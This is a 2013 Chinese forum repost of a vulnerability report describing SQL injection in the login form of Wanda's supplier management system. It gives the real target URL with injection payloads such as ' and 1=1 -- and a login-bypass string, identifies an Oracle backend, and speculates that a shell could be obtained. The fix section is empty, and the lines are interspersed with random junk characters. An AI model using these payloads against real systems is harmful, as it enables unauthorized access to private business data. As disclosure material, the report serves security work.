中国网络渗透测试联盟
标题:
万达供应商系统SQL注射漏洞
[打印本页]
作者:
admin
时间:
2013-3-24 20:16
标题:
万达供应商系统SQL注射漏洞
简要描述:万达某分站sql注入。敏感信息泄露。
" w' n" ?, F- s- t8 N
详细说明:
; P0 Z- J& h1 V% Y1 Y8 ?
万达scm系统登陆框sql注入。
+ Y; J* m* m+ b5 M4 s
/ R$ @+ \! ?; e: P& b1 x
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
2 V6 _ Y7 Z7 g) l% Z' M- U6 t
4 G; e$ U: F u; ]
: d u- a3 d, B
500错误。
2 S' n, V; f m S
, w: s' d* c4 k- n! x( G' F) m. t. Z) u
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
0 J. I, Q. g$ l9 W, F$ _* C
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
% I& K, c5 N7 R1 i/ n# ^
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
# |; e# @+ S6 K: g: ]+ B
经过分析,登陆验证的过程应该是:
% T" j, {2 W# Q# U' c9 r" x; W
8 |% O. x' J/ U& H/ w0 H8 e
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
7 T1 H! s% P+ W2 `' _( P% _
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
- S0 c) j3 ^: w0 S+ X) `) |
$ d* X- l. B5 d! b1 X
oracle数据库,存在注入点。@大连万达,你怎么看?
% ?9 y O. I3 U0 \: p- F# l
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
# Y9 d2 {3 P# Y; h3 B3 Y2 x
2 k% l2 b! Q: L' n" I1 |' q8 U
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
7 M& R1 B7 X( X# V7 Z2 A$ R6 @
漏洞证明:
0 J* a; ?& e* b. y* Q
万达scm系统登陆框sql注入。
5 y4 f& y; R% c0 B+ Y2 i
! ~' M1 [6 L( m, w% t) _* @! P5 h
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
$ ^5 E8 s# H! f* v
3 D4 @, l6 f' I
- u, X! ]) b1 B, m- k
500错误。
; R- Q, A. R' g M* v/ R) ]; X
" L0 d4 U( U: n. y/ A$ ~* x4 Q
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
; F5 Y5 a# \% K* m Q6 d" \7 S
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
+ `" B- u7 c: N3 z/ }1 }$ N
) \$ q3 y' X. z- p( `0 N9 v
o% O3 I6 ]! i+ @* b8 W; i. }
(截图有一点问题)
+ {5 {# K' j5 I' U
& z8 [1 x- c: d+ m" K; M3 O( H
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
! f1 e2 P- H1 a5 y- B! l" ^7 m
5 H6 E8 {; N, y: ^& o& W& u
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
5 C; p) w! H2 ~5 g+ [) K' D4 `
" k" g1 ]1 K; i# ^! {# f/ g9 O& {% L
绕过:
& C9 }- C" {& A, ?4 I, i
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
' n. i- _% Q; e8 h; @; n' L
5 [4 G( w ?' ~" ^& Y" `
+ A3 l8 K. g9 n
oracle数据库,存在注入点。@大连万达,你怎么看?
. f2 Z- O: Q9 g1 o- R
系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
& b7 u9 ]) Q* u) E0 \! u
& u7 h$ W$ l% Y% w/ x
修复方案:
) a5 T9 g, E# c9 }7 m
。。。
, W* R) a( t; o6 i" x
: p: W/ ?2 ^1 T! J: P2 M0 W
" B* ^: w0 r+ i
厂商已经确认
( D) G$ W" H6 f1 e \
. z/ R" e" b, v x) v8 \7 I
[/td][/tr]
3 x. x8 s/ V" j
[/table]
1 T: @' o4 K$ l
7 p; x% ?2 B6 J9 f& S
7 b H, L* e1 ~9 u4 H9 z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2